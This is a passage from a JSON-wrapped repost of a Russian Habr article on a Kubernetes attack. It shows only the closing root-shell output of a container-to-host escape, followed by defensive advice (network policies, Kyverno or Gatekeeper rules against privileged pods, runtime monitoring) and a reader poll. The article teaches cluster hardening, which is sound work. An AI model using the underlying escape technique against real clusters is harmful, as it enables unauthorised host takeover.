right kind of file id uid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n<h2>\u041a\u0430\u043a \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c?<\/h2>\n<ul>\n<li>\n<p>Network Policy \u2013  \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0431\u044b \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u043e\u0431\u0449\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432 \u043f\u043e \u0441\u0435\u0442\u0438. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043a\u0443\u044e \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u043f\u0440\u0435\u0442\u0438\u0442 \u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u0438\u0437 Pod \u0441 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432 Pod \u0441 Grafana<\/p>\n<\/li>\n<li>\n<p>Policy engine \u2013  \u0438\u043c\u0435\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043d\u0430 \u0437\u0430\u043f\u0440\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 Pod, \u043e\u0442 Kyverno \u0438\u043b\u0438 Gatekeeper, \u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0431\u044b \u0441\u0431\u0435\u0436\u0430\u0442\u044c \u043d\u0430 \u0445\u043e\u0441\u0442. \u0417\u0430\u043f\u0440\u043e\u0441 \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u043b \u0431\u044b \u0447\u0435\u0440\u0435\u0437 webhook<\/p>\n<\/li>\n<li>\n<p>Runtime observability &amp; security \u2013 \u0437\u043d\u0430\u043d\u0438\u0435 \u0438 \u043f\u043e\u043b\u043d\u0430\u044f \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0435\u0433\u043e \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0431\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0435\u0449\u0451 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0438<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"v-portal\" style=\"display:none;\"><\/div>\n<\/div>\n<p> <!----> <\/p>\n<div class=\"tm-article-poll\">\n<div class=\"tm-notice tm-article-poll__notice tm-notice_positive\"><!----> <\/p>\n<div class=\"tm-notice__inner\"><!----> <\/p>\n<div class=\"tm-notice__content\"><span>\u0422\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u0447\u0430\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0432 \u043e\u043f\u0440\u043e\u0441\u0435. <a rel=\"nofollow\" href=\"\/kek\/v1\/auth\/habrahabr\/?back=\/ru\/post\/670172\/&#038;hl=ru\">\u0412\u043e\u0439\u0434\u0438\u0442\u0435<\/a>, \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430.<\/span><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__header\">\u041f\u0440\u043e \u0447\u0442\u043e \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435?<\/div>\n<div class=\"tm-article-poll__answers\">\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent tm-article-poll__answer-percent_winning\">             50%           <\/span> <span class=\"tm-article-poll__answer-label\">Network Polciy<\/span> <span class=\"tm-article-poll__answer-votes\">             6           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress tm-article-poll__answer-progress_winning\" style=\"width:50%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             8.33%           <\/span> <span class=\"tm-article-poll__answer-label\">Policy engine<\/span> <span class=\"tm-article-poll__answer-votes\">             1           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:8.33%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             25%           <\/span> <span class=\"tm-article-poll__answer-label\">Observability tools<\/span> <span class=\"tm-article-poll__answer-votes\">             3           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:25%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             16.67%           <\/span> <span class=\"tm-article-poll__answer-label\">\u0421\u043a\u0430\u043d\u0435\u0440\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/span> <span class=\"tm-article-poll__answer-votes\">             2           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:16.67%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             0%           <\/span> <span class=\"tm-article-poll__answer-label\">Security tools<\/span> <span class=\"tm-article-poll__answer-votes\">             0           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:0%;\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__stats\">        \u041f\u0440\u043e\u0433\u043e\u043b\u043e\u0441\u043e\u0432\u0430\u043b\u0438 12 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.          \u0412\u043e\u0437\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u043d\u0435\u0442.      <\/div>\n<\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/670172\/\"> https:\/\/habr.com\/ru\/post\/670172\/<\/a><br \/><\/br><\/br><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-334421","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/334421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=334421"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/334421\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=334421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=334421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=334421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}